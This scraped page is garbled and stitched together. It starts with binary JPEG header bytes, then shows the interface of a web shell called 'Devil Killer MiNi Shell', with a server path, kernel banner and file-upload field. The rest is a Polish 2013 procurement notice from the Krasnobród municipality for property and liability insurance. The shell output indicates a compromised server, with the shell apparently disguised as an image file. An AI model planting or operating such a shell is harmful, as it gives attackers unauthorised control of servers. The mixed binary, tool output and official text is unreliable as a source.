JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130312/98120-N-2013.html

<p class="kh_header"><b>Krasnobród: Ubezpieczenie majątku Urzędu Miejskiego w Krasnobrodzie oraz jednostek organizacyjnych.</b><br>
<b>Numer ogłoszenia: 98120 - 2013; data zamieszczenia: 12.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krasnobród , ul. 3 Maja 36, 22-440 Krasnobród, woj. lubelskie, tel. 0-84 660 7691, faks 0-84 660 7692.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krasnobrod.pl w zakładce przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ubezpieczenie majątku Urzędu Miejskiego w Krasnobrodzie oraz jednostek organizacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

I. UBEZPIECZENIE OC zakres ubezpieczenia :
1.odpowiedzialność cywilna ubezpieczającego w związku ze zdarzeniem powodującym szkodę osobową lub rzeczową, powstałym w okresie ubezpieczenia i związanym z prowadzeniem działalności i posiadanym mieniem 
2.koszty wynagrodzenia rzeczoznawców powołanych ,w celu ustalenia okoliczności i rozmiaru  szkody
3.zwrot kosztów poniesionych przez  ubezpieczającego w celu zmniejszenia szkody i zabezpieczenia bezpośrednio zagrożonego mienia lub osoby przed szkodą, uzasadnionych okolicznościami szkody
4.koszty obrony sądowej przed roszczeniami poszkodowanych w sporze cywilnym
5.koszty obrony, jeżeli w wyniku zdarzenia powodującego odpowiedzialność  ubezpieczającego zostanie przeciwko niemu, jako sprawcy szkody, wszczęte postępowanie karne   
a) OC kontraktowe/szkody wyrządzone przez wadliwe wykonanie prac lub usług oraz nienależyte wykonanie zobowiązań/dot: Zakład Gospodarki Komunalnej w Krasnobrodzie.(suma ubezpieczenia 50.000.00zł ) 
b) Zespół Szkół Ogólnokształcących z tyt. Prowadzenia Stołówki/ ilość wydawanych dziennie obiadów pełnych średnio - 639  ilość  wydawanych dziennie samych zup -10.(suma ubezpieczenia 50.000.00zł )
c) OC pracodawcy dot: Urząd Miejski, Zakład Gospodarki Komunalnej ,Zespół Szkół Ogólnokształcących, Zespół Szkół Podstawowych, Szkoła Podstawowa Majdan Wielki, Szkoła Podstawowa w Kaczórkach; Miejsko Gminny Ośrodek Pomocy Społecznej, Warsztaty Terapii Zajęciowej w Dominikanówce, Krasnobrodzki Dom Kultury, Miejsko Gminna Biblioteka Publiczna
(suma ubezpieczenia 200.000.00zł)
2. OC nauczycieli/opiekunów i wychowawców/ dot. Zespół Szkół Ogólnokształcących, Zespół Szkół Podstawowych, Szkoła Podstawowa w Kaczórkach, Szkoła Podstawowa w Majdanie Wielkim, Warsztaty Terapii Zajęciowej w Dominikanówce.
(suma ubezpieczenia 50.000.00zł)
3. OC zarządcy nieruchomościami/szkody rzeczowe i osobowe na jedno i wszystkie zdarzenia w ciągu  ubezpieczenia dot. Urzędu Miejskiego w Krasnobrodzie/ np.szkody na drogach gminnych 56,7km,chodnikach gminnych  2 km,na boiskach sportowych /stadion Krasnobród ,boisko wielofunkcyjne przy ZSO, boisko Orlik, zalew w Krasnobrodzie, -skaleczenia podczas kąpieli itp. (suma ubezpieczenia 500.000.00zł)
II. UBEZPIECZENIE OD OGNIA I INNYCH ZDARZEŃ LOSOWYCH 
zakres ubezpieczenia: ogień, uderzenie pioruna, eksplozja, upadek statku powietrznego, akcja ratownicza w związku ze zdarzeniami wyżej wymienionymi, następstwa szkód wodociągowych /niezamierzone i niekontrolowane wydobywanie się wody ,innych cieczy lub pary z przewodów i urządzeń wodociągowych , kanalizacyjnych, centralnego ogrzewania, cofnięcie się ścieków z sieci kanalizacyjnej, nieumyślne pozostawienie otwartych kurków wodociągowych, pękanie rur/szkody spowodowane innymi żywiołami /huragan, powódź, grad, ciężar śniegu, lodu, obsunięcie ziemi ,lawiny, deszcz nawalny, dym /sadze, szkody spowodowane niezachowaniem parametrów elektrycznych, uderzenie pojazdu z ubezpieczony przedmiot/kradzież, włamanie, dewastacja

1. Środki trwałe/budynki ,budowle wg .wykazów/Urząd Miejski w Krasnobrodzie według wartości rzeczywistej. (suma ubezpieczenia 5.255.639,00zł)

- Szkoła Podstawowa w Kaczórkach wart. jak wyżej. (suma ubezpieczenia 1.400.201,00zł)
- Warsztat Terapii Zajęciowej w Dominikanówce wart. jak wyżej, (suma ubezpieczenia 210.000,00zł)
- Szkoła Podstawowa w Majdanie Wielkim wart. jak wyżej  (suma ubezpieczenia 372.217,00zł)
- Zakład Gospodarki Komunalnej w K-r z/s Majdan Wielki wart. jak wyżej  (suma ubezpieczenia 1.600.515,00zł)
- Zespół Szkół Podstawowych w Krasnobrodzie wart. jak wyżej, (suma ubezpieczenia 2.574.865,00zł)

2. Pozostałe środki trwałe /pompy ,agregaty i inne dot: Zakład Gospodarki Komunalnej w K-r z/s Majdan Wielki /wg. wykazu/, (suma ubezpieczenia 100.969.62zł)
-  Miejsko Gminna Biblioteka Publiczna w Krasnobrodzie. Balon BETA wzmocniony 6m, (suma ubezpieczenia 5.182,56 zł)
- Warsztaty Terapii Zajęciowej w Dominikanówce /zmywarko- wypażarka wart.6980, maszyna hafciarka  wart.7.000 ugul wart. 4700 (suma ubezpieczenia 18.680,00 zł)

Zespół Szkół Ogólnokształcących w Krasnobrodzie wg wykazu z wyłączeniem sprzętu elektronicznego  wartość brutto, (suma ubezpieczenia 189.531,54 zł)
-  Krasnobrodzki Dom Kultury w Krasnobrodzie /klarnet 4.908,85,saksofon altowy  4.353,09, saksofon tenorowy 5.777,20, tuba 4.800,00 (suma ubezpieczenia 19.839,14 zł)
-  Ochotnicze Straże Pożarne wg  wykazu, (suma ubezpieczenia 373.694,57 zł)
-  Krasnobrodzki Dom Kultury w K-r bramy garażowe szt.2 (suma ubezpieczenia 7.712,00 zł)


3. Wyposażenie/niskocenne /biurka, szafy, wyposaż.  
Strażnic OSP ,zbiory biblioteczne itp. ujęte w ewidencji środków niskocennych w poszczególnych jednostkach Szkoła Podstawowa w Kaczórkach na ogólną wartość /bez wykazu/(suma ubezpieczenia    63.982,95   zł)
-	Warsztaty Terapii Zajęciowej w Dominikanówce Wg wykazu  (suma ubezpieczenia  97.811,20 zł)
-	Krasnobrodzki Dom Kultury w Krasnobrodzie Bez wykazu (suma ubezpieczenia 94.593,96 zł)
-	Zespół Szkół Ogólnokształcących  w Krasnobrodzie wg wykazu (suma ubezpieczenia  518.658,80 zł)
-	Zakład Gospodarki Komunalnej w K-r z/s Majdan Wielki bez wykazu (suma ubezpieczenia 182.465,62 zł)
-	Szkoła Podstawowa w Majdanie Wielkim bez wykazu (suma ubezpieczenia 66.801,15 zł)
 -    Miejsko Gminna Biblioteka Publiczna w Krasnobrodzie (suma ubezpieczenia158.680,64 zł)
-	Zbiory biblioteczne 134.474,82zł,wyposażenie Punktu Informacji Turystycznej 6.765,29 zł wyposażenie biblioteki 17.440,53 zł
-	Miejsko-Gminny Ośrodek Pomocy Społecznej w Krasnobrodzie bez wykazu (suma ubezpieczenia  32.248,48zł)
-	Zespół Szkół Podstawowych w  Krasnobrodzie Bez wykazu (suma ubezpieczenia 381.082.66 zł)
-	Urząd Miejski w Krasnobrodzie bez wykazu (suma ubezpieczenia  182.330,19zł)
-	OSP Krasnobród bez wykazu (suma ubezpieczenia  6.715,50 zł)

III UBEZPIECZENIE OD KRADZIEŻY Z WŁAMANIEM, RABUNKU
1.	gotówka przechowywana dot. ZSO (suma ubezpieczenia  6.800.00 zł)
2.	gotówka transportowana dot. ZSO (suma ubezpieczenia  6.800.00 zł)

IV. UBEZPIECZENIE SPRZĘTU ELEKTRONICZNEGO OD WSZYSTKICH RYZYK  ogółem (suma ubezpieczenia 1.443.284,02zł)
w tym:
- Warsztaty Terapii Zajęciowej w Dominikanówce Wg Wykazu (suma ubezpieczenia 28.363,48 zł)
- Miejsko-Gminny Ośrodek Pomocy Społecznej w Krasnobrodzie wg wykazu (suma ubezpieczenia 63.824,25 zł)
- Szkoła Podstawowa w Kaczórkach  Wg wykazu (suma ubezpieczenia  109.810,12zł)
- Zakład Gospodarki Komunalnej w Krasnobrodzie  z/s Majdan Wielki wg Wykazu (suma ubezpieczenia  17.294,50zł)
- Zespół Szkół Ogólnokształcących w Krasnobrodzie Wg wykazów (suma ubezpieczenia  191.732,84zł)
- Szkoła Podstawowa w Majdanie Wielkim Wg wykazu (suma ubezpieczenia  77.774,58zł)
- Miejsko Gminna Biblioteka Publiczna w Krasnobrodzie wg Wykazu (suma ubezpieczenia 23.706,14 zł)
- Krasnobrodzki Dom Kultury w Krasnobrodzie wg wykazu 2 wykazów (suma ubezpieczenia  126.051,18zł)
- Zespół Szkół Podstawowych w Krasnobrodzie wg wykazu (suma ubezpieczenia 144.681,93 zł)
- Urząd Miejski w Krasnobrodzie wg wykazu (suma ubezpieczenia  660.045,00 zł)

V. UBEZPIECZENIE NASTĘPSTW NIESZCZĘŚLIWYCH WYPADKÓW świadczenia w przypadku śmierci z tytułu nieszczęśliwego wypadku, trwałego uszczerbku na zdrowiu, dzienna dieta za pobyt w szpitalu  naprawa lub nabycie protez i środków pomocowych.
A. Strażacy /281 osób/12 jednostek  zakres ubezpieczenia :podczas trwania akcji gaśniczej i ćwiczeń oraz w drodze i  z miejsca akcji i ćwiczeń (suma ubezpieczenia  10.000,00zł)
B. Sołtysi /16 osób/ zakres ubezpieczenia  24h/dobę (suma ubezpieczenia 10.000,00zł)
C. Kasjerzy /1 osoba/ w ZSO (suma ubezpieczenia 10.000,00 zł)
D. Uczestnicy Warsztatów Terapii Zajęciowej w Dominikanówce /osoby niepełnosprawne 38 osób zakres ubezpieczenia 24h/dobę (suma ubezpieczenia10.000,00 zł)

E. Strażacy / 74 osoby wg wykazów indywidualnych  z poszczególnych jednostek OSP/ suma ubezpieczenia wynikająca z treści ustawy z dnia 27 lutego 2003 roku o zmianie o ochronie. Przeciwpożarowej /Dz. U. Nr 52 poz. 452 z późniejszymi zmianami. (Zgodnie z ustawami)
VI. UBEZPIECZENIE MASZYN ELEKTRYCZNYCH OD SZKÓD ELEKTRYCZNYCH  w Urzędzie Miejskim  i jednostkach Organizacyjnych  359,89 kw.
VII. UBEZPIECZENIA KOMUNIKACYJNE (Polisy na poszczególne jednostki organizacyjne).
1. OC wg Wykazów 
2. AC wg wykazów/wartość klienta/ 14 szt. pojazdów zakres ubezpieczenia pełny łącznie z kradzieżą i wandalizmem (suma ubezpieczenia 705.000,00 zł)
3. NW kierowcy i pasażerów (suma ubezpieczenia  10.000,00 zł)

UWAGA: Szczegółowy opis przedmiotu zamówienia zawarty jest w Załącznikach (wykazach) do Specyfikacji Istotnych Warunków Zamówienia.

Szczególne Warunki  Ubezpieczenia.
Przedmiot ubezpieczenia :
1. Przedmiotem ubezpieczenie jest wynikające z przepisów prawa(ustawa o drogach publicznych ,Ustawa Prawo o ruchu drogowym i Kodeks Cywilny) zobowiązanie Ubezpieczającego oraz osób zatrudnionych na podstawie umowy o pracę do naprawienia szkody wyrządzonej osobie trzeciej w czasie trwania ubezpieczenia, jeżeli jej powstanie pozostaje w związku z posiadanym mieniem lub sprawowaniem funkcji zarządu terenami, drogami i ulicami ujętymi w dołączonym do polisy  w wykazie dróg, placów, mienia) lub zostało spowodowane przez osoby za działania których ,Ubezpieczający ponosi odpowiedzialność.
2.Ubezpieczenie obejmuje szkody spowodowane w szczególności następującymi zdarzeniami-przyczynami ich powstania :
a. złym stanem technicznym ,jezdni, poboczami chodników wynikającym z uszkodzeń nawierzchni w postaci ubytków, wyrw ,kolein ,zapadnięć lub spowodowanych rozmyciem.
b. zimowym utrzymaniem jezdni ,chodników(śliskość nawierzchni),letnim utrzymaniem czystości jezdni i chodników( np. stanem nawierzchni chodników spowodowanych zaśmieceniem). 
c. przez  zieleń rosnącą w pasie drogowym, w tym spadające lub leżące drzewa lub konary drzew.
d. leżące na drodze, porzucone, zgubione lub naniesione przedmioty.
e. śliskość wynikła z rozlania przez poruszające się pojazdy płynów i smarów,
f. stanem technicznym mostów i wiaduktów( w szczególności szkody spowodowane oderwaniem części  konstrukcji lub awarią konstrukcji),pomimo przeprowadzonych kontroli stanu technicznego zgodnie z obowiązującymi przepisami.
g .oznakowaniem lub brakiem oznakowania uszkodzonego w wyniku wandalizmu lub zdarzeń losowych,
h. awarią sygnalizacji świetlnej oraz innymi elementami bezpieczeństwa ruchu, w które wyposażony jest pas drogowy,
i. urządzeniami w nawierzchni drogi w szczególności brakiem pokrywy studzienki kanalizacyjnej lub wpustu ulicznego, spowodowanego kradzieżą lub aktem wandalizmu.
j. powstałymi po wykonaniu pracy lub usługi, jeżeli ich przyczyną jest nienależyte  wykonanie zleconych i odebranych przez zarządcę drogi usług lub robot (konserwacja, modernizacja, remont pasa drogowego).
k. zalaniem drogi przez nienależyte działające urządzenia odprowadzające wodę z pasa drogowego ,w tym również nienależytym odwodnieniem drogi przez rowy odwadniające w przypadku wystąpienia deszczu nawalnego.
l. robotami konserwacyjnymi ,interwencyjnymi i remontami cząstkowymi wykonywanymi silami własnymi, w tym wykonywanymi z użyciem emulsji i grysów oraz lokalnymi powierzchniowymi utrwaleniami nawierzchni,
ł. pojedynczymi wyrwami w poboczu
m. nienormatywną skrajnią poziomą jezdni spowodowaną zadrzewieniem lub prawidłowo oznakowanymi obiektami mostowymi lub zabudową
n. nienormatywną skrajnią pionową spowodowaną zadrzewieniem.
3.Wyłaczenie odpowiedzialności.
3.1.Wylączenie szczególne -Poza  wyłączeniami określonymi w OWU  Ubezpieczyciel nie odpowiada za szkody wynikające z zarządzania i administrowania drogami, ulicami :
A .kolejne powstałe z tej samej przyczyny(okoliczności) w danym miejscu po upływie 72 godzin  od dnia i godziny zgłoszenia pierwszej szkody i/lub zabezpieczenia  pasa drogowego najpóźniej w ciągu 72 godzin od chwili zgłoszenia tych okoliczności,
B .powstałe  na odcinkach pasa drogowego przekazanego przez Ubezpieczającego wykonawcom remontów ,modernizacji lub innych zabiegów konserwacyjno-eksploatacyjnych,
C .wyrządzone przez osoby za działania których ponosi odpowiedzialność  będące pod wpływem alkoholu, narkotyków lub podobnie działających środków, jeżeli roszczenie poszkodowanego zostało skierowane bezpośrednio do tej osoby,
D .spowodowane winą umyślną Ubezpieczającego lub osób, za które ponosi odpowiedzialność.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających. Zamówienie uzupełniające może stanowić nie więcej niż  50 % wartości zamówienia podstawowego i polegać będzie  na powtórzeniu zamówień z zakresu usług ubezpieczeniowych  zgodnych z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.50.00-3, 66.51.60.00-0, 66.51.51.00-4, 66.51.52.00-5, 66.51.53.00-6, 66.51.21.00-3, 66.51.61.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania przez Wykonawcę specjalnych uprawnień w formie zezwolenia o którym mowa w art. 6 ust.1 ustawy z dnia 22 maja 2003 r. o działalności ubezpieczeniowej. (Dz. U. 2010 nr 11 poz. 66 tekst jednolity z późniejszymi  zmianami). 
Ocena sposobu spełniania warunku przez wykonawcę przeprowadzona zostanie na podstawie załączonych dokumentów metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust.1 ustawy Prawo zamówień publicznych należy przedłożyć:
1) Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
2) Wykonawca wraz z ofertą składa listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz.331, z późn. zm), albo informację o tym, że nie należy do grupy kapitałowej o której mowa w art. 24 ust.2 pkt.5 ustawy Prawo zamówień publicznych.    
Dokumenty podmiotów zagranicznych:
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu o którym mowa w podpunkcie 1), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument lub dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w podpunkcie 1. zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem.  
Dokument zawierający oświadczenie powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu pod nazwą: (dokument potwierdzający posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesji, zezwolenia lub licencji)  składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę, potwierdzające, że posiada uprawnienia do wykonywania działalności związanej z przedmiotem zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana wysokości składki lub raty składki w przypadku zmiany sumy ubezpieczenia - zmiana wysokości składki lub raty składki w przypadku zmiany wartości majątku, 
- zmiany dotyczące liczby jednostek organizacyjnych Zamawiającego w przypadku powstania nowych jednostek w wyniku przekształcenia lub wyodrębniania, połączenia lub likwidacji;
